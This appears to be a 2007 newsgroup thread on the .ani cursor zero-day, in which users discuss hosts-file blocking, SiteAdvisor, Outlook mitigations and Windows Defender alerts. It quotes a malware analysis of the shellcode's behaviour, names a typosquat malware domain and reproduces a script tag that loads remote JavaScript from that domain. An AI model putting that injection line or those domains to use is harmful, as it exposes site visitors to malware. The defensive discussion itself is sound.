MSRC blog on the current 0-day .ani vulnerability

[Guest]

Bill,

Sorry for the confusion, I am referring to the use of JavaScript in the
proper functioning of "McAfee Site Advisor"redirecting the browser, not the
..ani exploit in question.

?
Tim

The domains I have seen mentioned at isc.sans.org have been used to
distribute malware before--so they may already be blocked .

I don't believe that JavaScript is involved in this one.

--

Stu,

I use the McAfee Site Advisor [not plus] extension in my Firefox.
Is there a way to test if it will "prevent you from going to any suspect
site unless you decide to overide its warning". I've seen the red flag
[icon
bar] but would like to know how to see if it will prompt me before going
to a
Really Bad [exploit] site.
Does it use/need JavaScript, as I generally have it turned off or blocked
using the NoScript extention. Does it make a pop up window that says "Are
you sure" or what?

Thanks in Advance,
?

:

For this I use McAfee`s Site Advisor plus

which will prevent you from going to any suspect site unless you decide
to
overide its warning. For me this has worked very well with both IE7 and
Firefox. ...

Stu

 

[Anonymous Bob]

This would be an excellent site to add to a hosts file, to block access.

127.0.0.1 and the site name as below, substituting the obvious.

There are definitely times that using hosts-file based blocking may make
good sense, and this is probably one.

There's a worm based on this exploit now that edits the hosts file:
http://securitywatch.eweek.com/browsers/worm_posing_as_ie_beta_download.html

At the current infection rate, it may be a losing battle to try to add the
sites into the hosts file, though anything is better than nothing.

I read somewhere else (and can't find it now) of a variation that deletes
the hosts file.

Bob Vanderveen

 

[Anonymous Bob]

[...]

I read somewhere else (and can't find it now) of a variation that deletes
the hosts file.

I found it.<g>

http://www.mnin.org/write/ani-notes.pdf
There are several malicious ANI files in circulation. The one to discuss is
mm.jpg from newasp, but others are likely very similar. Shellcode in mm.jpg
basically resolves kernel32 functions, downloads, and executes xx.exe (from
behavioral analysis). It doesn't do much but delete the system's HOSTS file,
write bdscheca001.dll to %SYSTEM%, and registers the DLL as
ShellExecuteHooks entry.

Bob Vanderveen

 

[Bill Sanderson MVP]

It is looking to me as though at least the www variant of this particular
domain has been taken down. The other one listed at ISC.SANS.ORG is still
pingable, however.

Thanks.
--

 

[Bill Sanderson MVP]

Presumably, Windows Defender would say something about that
ShellExecuteHooks registration--and possibly the Hosts file change as well.

I doubt that I'm going to be in a position to test this even though you've
laid it out pretty clearly--but thanks, anyway!

--

[...]

I read somewhere else (and can't find it now) of a variation that deletes
the hosts file.

I found it.<g>

http://www.mnin.org/write/ani-notes.pdf
There are several malicious ANI files in circulation. The one to discuss
is
mm.jpg from newasp, but others are likely very similar. Shellcode in
mm.jpg
basically resolves kernel32 functions, downloads, and executes xx.exe
(from
behavioral analysis). It doesn't do much but delete the system's HOSTS
file,
write bdscheca001.dll to %SYSTEM%, and registers the DLL as
ShellExecuteHooks entry.

Bob Vanderveen

 

[Guest]

Hi Tim

Apologies for the late response to your post - night shift. I meant the Java
2 platform sorry for the confusion. As for the installation of plus into
Firefox, in my situation I was able to import my IE7 settings to Firefox post
installation using the File>Import wizard. As you step thru the wizard you
are given the option (among other things) to import Internet Options so it
was not necessary for me to specifically install SA plus into Firefox. I have
not been able to find a link specific to a SA plus download for Firefox but
to allay your concerns the following link provides info in which SA plus has
supported Firefox & AOL since Dec last year. So I am ASSUMING the version
listed on McAfee`s download site supports both browsers. It works fine on my
system.

http://www.eweek.com/article2/0,1895,2074714,00.asp

Stu

Interesting Stu,

While waiting for your reply I visited the SiteAdvisor site and could not
find a "Plus" version for Firefox ,only for IE. The only version I could
find for Firefox was the free version. Perhaps the SiteAdvisor for IE uses
an activeX control to block you before going to an "exploit" site. Since FF
does not use activeX this would imply it would not work. [or that I'm just to
blind to find the Plus version for FF, got a link??]

You mention that you have "Java" [I assume you mean JavaScript] turned off .
That seems strange as well, as this newsgroup requires JavaScript [unless of
course you are not using a browser, in which case it would not matter.]

Interesting, verrrrry interesting,
?
Tim

Hi Tim

Good question and one which I have never had the courage to try before I
upgraded to the plus version although I strongly suspect it would not which
is probably why you have to pay a few bucks for the extra protection plus
gives you. With plus if you select a red, amber or untested link you will
automatically be redirected to a McAfee warning page where you can carefully
study the site reports before proceeding further. If you decide not to
proceed then there is a back link button which will return you to the page
you were viewing before. As for Java. It doesn`t seem to need it as I`ve used
with it turned on and off. In fact, right now I have it off.

Hope this helps.

Stu

Stu,

I use the McAfee Site Advisor [not plus] extension in my Firefox.
Is there a way to test if it will "prevent you from going to any suspect
site unless you decide to overide its warning". I've seen the red flag [icon
bar] but would like to know how to see if it will prompt me before going to a
Really Bad [exploit] site.
Does it use/need JavaScript, as I generally have it turned off or blocked
using the NoScript extention. Does it make a pop up window that says "Are
you sure" or what?

Thanks in Advance,
?

:

For this I use McAfee`s Site Advisor plus
which will prevent you from going to any suspect site unless you decide to
overide its warning. For me this has worked very well with both IE7 and
Firefox. ...

Stu

 

[Guest]

Talking of marking your messages "read as plain text" which it seems doesn`t
guarantee protection. All the hype seems to centre around OE but I don`t
recall any mention of Outlook. Would I be right or wrong in thinking,
therefore, that Outlook is not likely to be affected by this exploit on the
email side of things? Any takers ? I have the option set in Outlook anyway
but was just wondering.

Stu

Type carefully folks,

this site should be avoided at ALL costs,
I only mention it because of the obvious,

==============
microfsot [dot] com
==============

again, type CAREFULLY!!!

I've read that there are now over a hundred sites are spreading the
exploits. There are also many variations. It isn't only .ani files as the
file extension could be jpeg or others.

The most comprehensive list of sites and file hashes I've seen so far is
here:
http://isc.sans.org/diary.html?storyid=2540

If you use OE under Tools | Options | Read check the box for "Read all
messages in plain text". Please note that this is *not* a total defense as
you can still be infected if you reply to or forward a message.

Be careful out there,
Bob Vanderveen

 

[Guest]

I was wondering the exact same thing myself. I`m sure my test would not be so
thorough as yours Bill but I have just tried editing my hosts file as follows:

1. Adding an entry
2. Deleting an entry
3. Deleting the Hosts File to the recycle bin and restoring again.

WD remained ominously silent throughout.

Stu

Stu

Presumably, Windows Defender would say something about that
ShellExecuteHooks registration--and possibly the Hosts file change as well.

I doubt that I'm going to be in a position to test this even though you've
laid it out pretty clearly--but thanks, anyway!

--

[...]

I read somewhere else (and can't find it now) of a variation that deletes
the hosts file.

I found it.<g>

http://www.mnin.org/write/ani-notes.pdf
There are several malicious ANI files in circulation. The one to discuss
is
mm.jpg from newasp, but others are likely very similar. Shellcode in
mm.jpg
basically resolves kernel32 functions, downloads, and executes xx.exe
(from
behavioral analysis). It doesn't do much but delete the system's HOSTS
file,
write bdscheca001.dll to %SYSTEM%, and registers the DLL as
ShellExecuteHooks entry.

Bob Vanderveen

 

[Anonymous Bob]

Talking of marking your messages "read as plain text" which it seems doesn`t
guarantee protection. All the hype seems to centre around OE but I don`t
recall any mention of Outlook. Would I be right or wrong in thinking,
therefore, that Outlook is not likely to be affected by this exploit on the
email side of things? Any takers ? I have the option set in Outlook anyway
but was just wondering.

I think there has been conflicting information regarding this point, so
here's the word directly from Microsoft:
http://www.microsoft.com/technet/security/advisory/935423.mspx
From the Workaround section:
Read e-mail messages in plain text format if you are using Outlook 2002 or a
later version, or Windows Mail to help protect yourself from the HTML e-mail
preview attack vector.
Microsoft Outlook 2002 users who have applied Office XP Service Pack 1 or a
later version can enable this setting and view e-mail messages that are not
digitally signed or e-mail messages that are not encrypted in plain text
only.

Caveat: Reading e-mail in plain text on Windows Vista Mail does not mitigate
attempts to exploit the vulnerability when Forwarding and Replying to mail
sent by an attacker.

Note: Reading e-mail in plain text on Outlook Express does not mitigate
attempts to exploit this vulnerability.

Impact of Workaround: E-mail messages that are viewed in plain text format
will not contain pictures, specialized fonts, animations, or other rich
content. Additionally:

.. The changes are applied to the preview pane and to open messages.

.. Pictures become attachments so that they are not lost.

.. Because the message is still in Rich Text or HTML format in the store, the
object model (custom code solutions) may behave unexpectedly.

Bob Vanderveen

 

[Bill Sanderson MVP]

I know that in the past, Windows Defender has raised flags about some
changes to the hosts file, but I haven't tracked exactly what.

Your test is worrying, but perhaps not conclusive--I don't know whether it
is possible to distinguish between programmatic manipulation of the file,
and manipulation through the user interface.

All things considered, I think Bob Vanderveen's comments expose the weakness
of the hosts file as a defense against malware already in place. It is
pretty good for keeping novice users away from bad places, but easily
defeated.

--

I was wondering the exact same thing myself. I`m sure my test would not be
so
thorough as yours Bill but I have just tried editing my hosts file as
follows:

1. Adding an entry
2. Deleting an entry
3. Deleting the Hosts File to the recycle bin and restoring again.

WD remained ominously silent throughout.

Stu

Stu

Presumably, Windows Defender would say something about that
ShellExecuteHooks registration--and possibly the Hosts file change as
well.

I doubt that I'm going to be in a position to test this even though
you've
laid it out pretty clearly--but thanks, anyway!

--

[...]
I read somewhere else (and can't find it now) of a variation that
deletes
the hosts file.

I found it.<g>

http://www.mnin.org/write/ani-notes.pdf
There are several malicious ANI files in circulation. The one to
discuss
is
mm.jpg from newasp, but others are likely very similar. Shellcode in
mm.jpg
basically resolves kernel32 functions, downloads, and executes xx.exe
(from
behavioral analysis). It doesn't do much but delete the system's HOSTS
file,
write bdscheca001.dll to %SYSTEM%, and registers the DLL as
ShellExecuteHooks entry.

Bob Vanderveen

 

[Dave M]

....Yes, that would be ominous. My addition to HOSTS using HostsMan was
immediately spotted by Defender and I permitted it. Assuming you have RTP
activated on all items and with both not yet classified software (HostsMan)
and permitted to run software checked allowing you to be notified. I also
received a duplicate notification about 30 seconds later from WinPatrol.

--

Regards, Dave

I was wondering the exact same thing myself. I`m sure my test would not
be so
thorough as yours Bill but I have just tried editing my hosts file as
follows:

1. Adding an entry
2. Deleting an entry
3. Deleting the Hosts File to the recycle bin and restoring again.

WD remained ominously silent throughout.

Stu

Stu

Presumably, Windows Defender would say something about that
ShellExecuteHooks registration--and possibly the Hosts file change as
well.

I doubt that I'm going to be in a position to test this even though
you've
laid it out pretty clearly--but thanks, anyway!

--

[...]
I read somewhere else (and can't find it now) of a variation that
deletes
the hosts file.

I found it.<g>

http://www.mnin.org/write/ani-notes.pdf
There are several malicious ANI files in circulation. The one to
discuss
is
mm.jpg from newasp, but others are likely very similar. Shellcode in
mm.jpg
basically resolves kernel32 functions, downloads, and executes xx.exe
(from
behavioral analysis). It doesn't do much but delete the system's HOSTS
file,
write bdscheca001.dll to %SYSTEM%, and registers the DLL as
ShellExecuteHooks entry.

Bob Vanderveen

 

[Guest]

I was wondering the exact same thing myself. I`m sure my test would not be so
thorough as yours Bill but I have just tried editing my hosts file as follows:

1. Adding an entry
2. Deleting an entry
3. Deleting the Hosts File to the recycle bin and restoring again.

WD remained ominously silent throughout.

I think I'd expect that Stu - but try this: Use Spybot S&D either to add or
remove its own hosts file. Whichever way you do it, Defender reassuringly
pops up a little flag to ask you to permit or deny the hosts file change.

 

[Guest]

I know that in the past, Windows Defender has raised flags about some
changes to the hosts file, but I haven't tracked exactly what.

Ah... just noticed this - please see my reply to Stu's post, Bill. Changes
made by Spybot to the hosts file do generate Defender alerts - so I assume
Defender would push a flag up if the hosts file were changed by any other
software?

 

[Guest]

Ah yes Bob. Got it. Many thanks, should have read more carefully.

Stu

 

[Bill Sanderson MVP]

I don't know whether the flag is raised because of the content of those
changes (i.e. the sites that Spybot is putting in there are BAD sites)--or
because the change is being made by a program, somehow.



--

 

[plun]

The domains I have seen mentioned at isc.sans.org have been used to
distribute malware before--so they may already be blocked .

I don't believe that JavaScript is involved in this one.

Hi Bill

Well, javascript is indeed involved..

<script src=http://macr.microfsot.com/<removed>.js></script>

http://www.cisrt.org/enblog/read.php?68

But he is scared today and changed it.
http://www.cisrt.org/enblog/read.php?69

But again.... this gang will probably make new variants för spam...

http://www.spamhaus.org/statistics/spammers.lasso

Its also a patch from Zert....No1 in reversed engineering...
http://zert.isotf.org/advisories/zert-2007-01.htm

F-Secure gave it Radar Alert Level 2 directly

http://www.f-secure.com/v-descs/agent_bky.shtml

regards
plun

 

[Bill Sanderson MVP]

So it is... That second entry (69) is interesting. I should look up what
actually happened to the earlier worm author referenced.

I have a spam in hand which may well be related to this--it includes a
numeric IP which is located in China--haven't tested beyond that to see what
is there.

--

 

[Guest]

Thanks for the feedback Alan I`ll try that.

Stu

I think I'd expect that Stu - but try this: Use Spybot S&D either to add or
remove its own hosts file. Whichever way you do it, Defender reassuringly
pops up a little flag to ask you to permit or deny the hosts file change.

 

[Guest]

Thanks for the input Dave. I use Hostsman also and just reinstalled Winpatrol
.. Reran an edit of my hosts file this time (adding and deleting) an entry
which Winpatrol detected on both occasions but WD did not (all options
selected). Tried deleting and restoring Hosts - neither detected. Now I`m
totally confused and concerned. Interestingly if you reject the change in
Winpatrol, the hosts file count does not revert to the original count. eg
right now I show 16972 MVPS entries. If I delete one entry it shows 16971 BUT
Winpatrol pops up and asks me if I accept the change. In this case I reject
but Hostsman still shows 16971 entries. One would have thought it would
revert back to 16972. Oh well, it is in Beta so maybe thats the answer.

Stu

....Yes, that would be ominous. My addition to HOSTS using HostsMan was
immediately spotted by Defender and I permitted it. Assuming you have RTP
activated on all items and with both not yet classified software (HostsMan)
and permitted to run software checked allowing you to be notified. I also
received a duplicate notification about 30 seconds later from WinPatrol.

--

Regards, Dave

I was wondering the exact same thing myself. I`m sure my test would not
be so
thorough as yours Bill but I have just tried editing my hosts file as
follows:

1. Adding an entry
2. Deleting an entry
3. Deleting the Hosts File to the recycle bin and restoring again.

WD remained ominously silent throughout.

Stu

Stu

Presumably, Windows Defender would say something about that
ShellExecuteHooks registration--and possibly the Hosts file change as
well.

I doubt that I'm going to be in a position to test this even though
you've
laid it out pretty clearly--but thanks, anyway!

--



[...]
I read somewhere else (and can't find it now) of a variation that
deletes
the hosts file.

I found it.<g>

http://www.mnin.org/write/ani-notes.pdf
There are several malicious ANI files in circulation. The one to
discuss
is
mm.jpg from newasp, but others are likely very similar. Shellcode in
mm.jpg
basically resolves kernel32 functions, downloads, and executes xx.exe
(from
behavioral analysis). It doesn't do much but delete the system's HOSTS
file,
write bdscheca001.dll to %SYSTEM%, and registers the DLL as
ShellExecuteHooks entry.

Bob Vanderveen

 

[Tom Emmelot]

Hi Plun,

Welcome back and good documented as usual!

Regards >*< TOM >*<

plun schreef: